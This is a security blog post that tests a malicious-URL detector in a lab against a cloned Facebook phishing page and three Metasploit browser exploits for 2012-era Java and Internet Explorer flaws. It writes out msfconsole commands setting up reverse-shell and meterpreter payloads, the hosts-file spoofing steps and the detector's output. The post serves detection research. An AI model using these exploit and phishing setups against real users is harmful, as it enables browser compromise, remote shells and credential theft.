Statistical URL Analyzer – with MetaSploit

In continuation of the previous blog post, in which I gave a sneak preview of the Statistical URL Analyzer, this article briefly looks at MetaSploit and SET, two of the most widely used kits for generating payloads laced with exploits, deploying them and eventually exploiting the target systems. Our use of MetaSploit is limited to testing the SURL Analyzer and simulating real-world scenarios.

Speaking of MetaSploit reminds me of a very recent attack on two Nepalese Government websites, which were compromised and used to serve a drive-by download. The full report can be viewed here. In their research they found that the malware JAR was created using MetaSploit.

Snippet of the report, highlighting the usage of MetaSploit:

“… It’s interesting to note that all those compromises had injected code that was taken from the Metasploit framework, served in clear form, and not obfuscated. Although the use of code from the Metasploit framework doesn’t necessarily indicate a link between all the compromises …”

For testing the Statistical URL Analyzer, we set up Virtual Machines with BackTrack 5 and created a few payloads consisting of Phishing pages and exploit-laced pages, all served via a cloned website.

In the below example, we have cloned facebook.com for two purposes:

1: Create a malicious page which will infect the victim's machine

2: Capture passwords; in the real world this would be nothing less than a Phishing web-site

While simulating a real-world scenario, it is imperative to know that:

1: A genuine website is hacked using various methods and malicious code is inserted into it

2: A fake domain, similar to the domain whose users are being targeted, is registered, a web-server is deployed and the trap is set. Eg. www.faceb0ok.com

3: Sometimes we come across URLs with seemingly long domains, such as www.facebook.com.fake.domain.com. These types of domains are mostly targeted at Smart-Phone users: when viewing the link, a Smart-Phone user sees only the first few characters of the entire domain, which gives them the false belief that they are visiting hxxp://www.facebook.com. In this scenario, additional sub-domains are created to spoof the actual domain.
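The three spoofing patterns above can be caught with a few host-name heuristics. The following is an added example and not the SURL Analyzer's own code; the brand list, the public-suffix subset and the homoglyph table are assumptions chosen for illustration.

```python
from urllib.parse import urlsplit
# Constructed brand list: the real analyzer's list is not on the page and is assumed here.
PROTECTED = {"facebook.com", "paypal.com"}
TWO_LABEL_SUFFIXES = {"co.uk", "com.au", "co.in"}   # assumed subset of two-label suffixes
# Digits and symbols commonly substituted for letters, e.g. faceb0ok -> facebook.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "@": "a"})


def owner_domain(host):
    """Best-effort registrable domain: last two labels, or three under a two-label suffix."""
    parts = host.lower().rstrip(".").split(".")
    if len(parts) >= 3 and ".".join(parts[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(parts[-3:])
    return ".".join(parts[-2:])


def edit_distance(a, b):
    """Levenshtein distance; one edit away from a brand name is the classic typo-squat."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze_host(url):
    """Return [(indicator, brand), ...] for the URL's host; an empty list means nothing suspicious."""
    if "://" not in url:
        url = "http://" + url          # bare hosts and defanged hxxp:// links both parse
    host = (urlsplit(url).hostname or "").lower()
    owner = owner_domain(host)
    if owner in PROTECTED:
        return []                      # the genuine site, including its real sub-domains
    owner_name = owner.split(".")[0]
    findings = []
    for brand in PROTECTED:
        name = brand.split(".")[0]
        if owner_name == name:
            continue                   # same name under another suffix: not covered here
        # Scenario 3: the brand appears as a sub-domain of an unrelated owner domain.
        if host.startswith(brand + ".") or "." + brand + "." in host:
            findings.append(("SubdomainSpoof", brand))
        # Scenario 2: a digit/symbol stand-in (faceb0ok) or a one-character typo (facebrok).
        elif owner_name.translate(HOMOGLYPHS) == name:
            findings.append(("HomoglyphSpoof", brand))
        elif edit_distance(owner_name, name) == 1:
            findings.append(("Lookalike", brand))
    return findings
```

A brand registered under another public suffix (facebook.com.au) is deliberately left to a separate allow-list rather than flagged here.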

In order to verify the effectiveness and robustness of the algorithm, we modified the hosts file and added the fake domain entries to it. This ensures that, from the test machine, the fake facebook.com domains point to the lab server, since entries in the hosts file take precedence over domain resolution via a DNS server. This was done to simulate the real-world scenario.

Eg. 1: entry in hosts file '127.0.0.1      www.facebrok.com'
Eg. 2: entry in hosts file '127.0.0.1      www.faceb0ok.com'

MetaSploit Configuration for various vulnerabilities

Exploit     : 1
CVE         : 2012-4681
OSVDB       : 84867
Reference   : Link

MetaSploit Commands

msf exploit(java_jre17_exec)> use exploit/multi/browser/java_jre17_exec
msf exploit(java_jre17_exec)> set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp
msf exploit(java_jre17_exec)> set LHOST 192.168.5.200
LHOST => 192.168.5.200
msf exploit(java_jre17_exec)> set SRVPORT 80
SRVPORT => 80
msf exploit(java_jre17_exec)> set URIPATH /
URIPATH => /
msf exploit(java_jre17_exec)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.200:4444
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.5.200:80/
[*] Server started.

Exploit    : 2
CVE        : 2012-1723
OSVDB      : 82877
BID        : 52161
Reference  : Link

MetaSploit Commands

msf exploit(java_verifier_field_access)> use exploit/multi/browser/java_verifier_field_access
msf exploit(java_verifier_field_access)> set TARGET 1
TARGET => 1
msf exploit(java_verifier_field_access)> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(java_verifier_field_access)> set LHOST 192.168.5.200
LHOST => 192.168.5.200
msf exploit(java_verifier_field_access)> set SRVPORT 80
SRVPORT => 80
msf exploit(java_verifier_field_access)> set URIPATH /1
URIPATH => /1
msf exploit(java_verifier_field_access)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.200:4444
[*] Using URL: http://0.0.0.0:80/1
[*] Local IP: http://192.168.5.200:80/1
[*] Server started.

Exploit    : 3
CVE        : 2012-4969
OSVDB      : 85532
MSB        : MS12-063
Reference  : Link

MetaSploit Commands

msf exploit(ie_execcommand_uaf)> use exploit/windows/browser/ie_execcommand_uaf
msf exploit(ie_execcommand_uaf)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ie_execcommand_uaf) > set LHOST 192.168.5.200 
LHOST => 192.168.5.200
msf exploit(ie_execcommand_uaf) > set SRVPORT 80
SRVPORT => 80
msf exploit(ie_execcommand_uaf) > set URIPATH /2
URIPATH => /2
msf exploit(ie_execcommand_uaf) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.5.200:4444 
[*] Using URL: http://0.0.0.0:80/2
[*] Local IP: http://192.168.5.200:80/2
[*] Server started.

The goal of this exercise was to see whether the SURL Analyzer is able to detect these pages as malicious. The reasoning is that if a page is detected, it can be mitigated. Detection is based solely on the algorithm, not on a database of known malicious URLs.

Result 1:

Checking : http://www.facebrok.com
action = 0
0-scripts-0
ApInv=1 #Mal
Results=1
Analysis Time=0.00176063379471494 seconds
Total Time=0.0274778485256021 seconds
#ToolKit #Result =1 Dmn: h00p://www.facebrok.com RPT: https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_195848.txt

MetaSploit Console Output:

[*] 192.168.5.200    java_jre17_exec - Java 7 Applet Remote Code Execution handling request

Result 2:

Checking : http://www.facebrok.com/1
Server Header REDIRECTING to : /1/
action = 0
0-scripts-0
JAsz=1 #Mal
JAc=1 #Mal
Results=2
Analysis Time=0.196207084964831 seconds
Total Time=1.67632544065315 seconds
#ToolKit #Result =2 Dmn: h00p://www.facebrok.com RPT: https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_200158.txt

MetaSploit Console Output:

[*] 192.168.5.200    java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.5.200    java_verifier_field_access - Generated executable to drop (73802 bytes).

Result 3:

Checking : http://www.facebrok.com/2
Server Header REDIRECTING to : /2/TgolD.html
Downloading Frame : www.facebrok.com/2/EpjstT.html
Sc1=1 #Mal
FR?Nor=1 
DHx=1 
Results=2
Analysis Time=0.0272505794048455 seconds
Total Time=0.112398237387382 seconds
#ToolKit #Result =2 Dmn: h00p://www.facebrok.com RPT: https://dl.dropbox.com/u/12294415/SURL/10_05/p_www_facebrok_com_200417.txt

MetaSploit Console Output:

[*] 192.168.5.200    ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
[*] 192.168.5.200    ie_execcommand_uaf - Redirecting to TgolD.html
[*] 192.168.5.200    ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
[*] 192.168.5.200    ie_execcommand_uaf - Loading TgolD.html
[*] 192.168.5.200    ie_execcommand_uaf - Using msvcrt ROP
[*] 192.168.5.200    ie_execcommand_uaf - Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)
[*] 192.168.5.200    ie_execcommand_uaf - Loading EpjstT.html
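To make the report lines in the three results above machine-readable (for example, to feed them into a log pipeline), here is a small parser, added as an example and not part of the SURL Analyzer. The sample log is constructed from Result 1 and Result 3 (abridged); the meaning of the individual indicator names is not documented on the page, so only the '#Mal' tag and the Results count are interpreted.

```python
import re
# Constructed sample: Result 1 and Result 3 from the runs above (abridged), joined as one log.
SAMPLE_LOG = """\
Checking : http://www.facebrok.com
0-scripts-0
ApInv=1 #Mal
Results=1
Analysis Time=0.00176063379471494 seconds
Checking : http://www.facebrok.com/2
Server Header REDIRECTING to : /2/TgolD.html
Downloading Frame : www.facebrok.com/2/EpjstT.html
Sc1=1 #Mal
FR?Nor=1
DHx=1
Results=2
Analysis Time=0.0272505794048455 seconds
"""
# "NAME=value" indicator lines; a trailing "#Mal" tag marks the indicator as malicious.
INDICATOR = re.compile(r"^([A-Za-z0-9?]+)=(\d+)(\s+#Mal)?$")
TIMING = re.compile(r"^(Analysis|Total) Time=([0-9.]+) seconds$")


def parse_report(text):
    """Split analyzer output into one record per 'Checking :' block; unknown lines are skipped."""
    records, cur = [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("Checking :"):
            cur = {"url": line.split(":", 1)[1].strip(), "redirect": None,
                   "frames": [], "indicators": {}, "malicious": [], "results": None}
            records.append(cur)
        elif cur is None or not line:
            continue
        elif line.startswith("Server Header REDIRECTING to :"):
            cur["redirect"] = line.split(":", 1)[1].strip()
        elif line.startswith("Downloading Frame :"):
            cur["frames"].append(line.split(":", 1)[1].strip())
        elif line.startswith("Results="):
            cur["results"] = int(line.split("=", 1)[1])
        elif m := TIMING.match(line):
            cur[m.group(1).lower() + "_time"] = float(m.group(2))
        elif m := INDICATOR.match(line):
            cur["indicators"][m.group(1)] = int(m.group(2))
            if m.group(3):
                cur["malicious"].append(m.group(1))
    return records


def is_detected(record):
    # Any #Mal-tagged indicator, or a non-zero Results count, counts as a detection.
    return bool(record["malicious"]) or bool(record["results"])
```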

The next blog post will contain my explanation of the internal workings of the SURL Analyzer. Till then – Stay Safe.
